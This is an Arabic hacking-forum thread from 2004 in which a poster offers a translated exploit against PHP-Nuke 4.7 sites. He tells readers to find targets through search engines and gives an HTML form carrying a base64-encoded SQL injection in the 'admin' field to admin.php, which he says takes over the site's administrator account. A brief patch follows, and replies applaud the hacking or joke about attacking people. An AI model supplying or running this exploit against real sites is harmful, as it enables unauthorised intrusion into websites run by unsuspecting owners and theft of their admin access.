ثغرة في php nuke 4.7

goldskull · #1 22-11-2004, 10:28 AM

بسم الله الرحمن الرحيم
السلام عليكم ورحمة الله وبركاتة
كما عودتكم لازم موضوع جديد
الحمد لله خذينا الموضوع هذا من احد مواقع السكرتي الأجنبية وترجمناه ووسهلنا عليكم الاختراق هذي ثغرة في اصدار النيوك 4.7

نبدا الشرح
اولا نروح احد محركات البحث
www.google.com
www.yahoo.com
www.av.com

ونكتب فية للبحث العشوائي للي ما عندة موقع يخترقة
php nuke 4.7
وبعيدن تطلع النتايج عاد عد كم موقع تقدر تخترقة بس مو كلهم ممكن بعضهم سادين الثغرة بس نجرب يا سلام شلون نخترقهم انا اقول لكم

اعمل صفحة html باي طريقية عن طريق الفرونت بيج عن طريق موقع عن طريق الكاتب اي شي المهم تسوي صفحة تكون فيها الاوامر هذي

كود:

<form name="mantra" method="POST" action="http://www.sitewithphpnuke.com/admin.php"> <p>TITLE: <input type="********" name="add_title"> <br> CONTENT: <********area name="add_content" rows=10 cols=50></********area> <br> DATE: <input type="********" name="add_mdate"> <br> E-MAIL: <input type="********" name="add_expire"> <br> <input type="hidden" name="add_expire" value="0"> <br> <input type="hidden" name="add_active" value="1"> <br> <input type="hidden" name="add_view" value="1"> <br> <input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox"> <br> <input type="hidden" name="add_radminsuper" value="1"> <br> <input type="hidden" name="op" value="addmsg"> </p> <p> <input type="submit" name="Submit" value="Post this message"> <br> </p> </form>

الحين سجل الملف وافتحة وراح تحصل الباسورد حق مدير الموقع يلا عاد العب في الموقع لعب

===============================
سد الثغرة الاهم
ضعه في ملف admin.php

كود:

Apply this code to your admin.php file: if ( !empty($HTTP_GET_VARS['admin']) ) { die("Shit! Mantra wins =)"); } if ( !empty($HTTP_POST_VARS['admin']) ) { die("Shit! Mantra wins =)"); }

تحياتي
goldskull
الجمجمة الذهبية
ترقبوا كل جديد منا ان شاء الله

هند · #2 22-11-2004, 10:50 AM

وعليكم السلام ورحمة الله وبركاته

الجمجمة الذهبية
يعطيك العافية ، إن شاءالله نتعلم منك

لك الشكر
السؤدد

goldskull · #3 22-11-2004, 11:17 AM

السؤدد
حياك الله اخوي وان شاء الله اقدر اجيب لكم كل جديد

انتظروا الجديد منا ...
جولد سكل
الجمجمة الذهبية

كويتي · #4 22-11-2004, 01:26 PM

امحق علم يا السؤدد
عز الله انج ما تعلمتــي شي فيه خيــر
هذة هاك يعني اختراق مواقع واختراق
اجهزت العالم

الجمجمه علمني لحالي خل افجــرواحد ويانه
ما ادانيـــه خخخخخخخخخخخخخ

كويتي

ابوحمد الشامري · #5 23-11-2004, 06:26 AM

لا هنت يا ابو محمد على هذا الشرح الوافي على الاختراق ما قصرت يا السنافي

ابوحمد الشامري

goldskull · #6 23-11-2004, 02:40 PM

كويتي
حياك الله اخوي كويتي نورت الموضوع بس احب اقول لك ان الهكر علم كبير ما يستهان فية بس احنا مو مرتزقة يعني نشتغل عند احد انا اعطيكم الزبدة من كل دراستي للهاك اظن مرت اربع سنين ونصف واكثر بعد وانا فية اما المواقع ثلاث سنين مختصر الكلام ان الهاك علم قوي ومن الهاك تقدر تصنع حماية جبارة

في قاعدة بالأنجليزي الترجمة مالتها تقول
اذا لم تخترق جهازك نظامك موقعك من سيفعل
فلازم احنا نحاول ما في شي من الفشل انا ميتين مرة فشلت بس نحاول جرب اي طرق المهم تنجح
كويتي باين عليك شري ههههه ودك تفجر اجهزة هههه

ابوحمد الشامري
حياك الله نورت الموضوع ان شاء الله تفيد وتستفيد وان شاء الله الله يقدرني احط لكم مواضيع عن الاختراق بس خلونا الأول نخلص من دورة المواقع

كويتيه · #7 25-11-2004, 07:22 PM

يعطيك العافيه اخوي على الموضوع..

عاد انا وي اتعلم حزات يكون الواحد فيه حره على احد و وده يسوي فيه دقه لوول..

goldskull · #8 25-11-2004, 08:19 PM

كويتيه مشكورة على الرد وان شاء الله تسفيدي

بس عاد ان شاء الله ما يكون الشخص انا ولا راح اسجنك في لعبة السجن هههههه

جالس بن مبارك · #9 28-11-2004, 09:17 AM

لا هنت و بيض الله و جهك

goldskull · #10 28-11-2004, 04:22 PM

لورنس
thanks i wish it good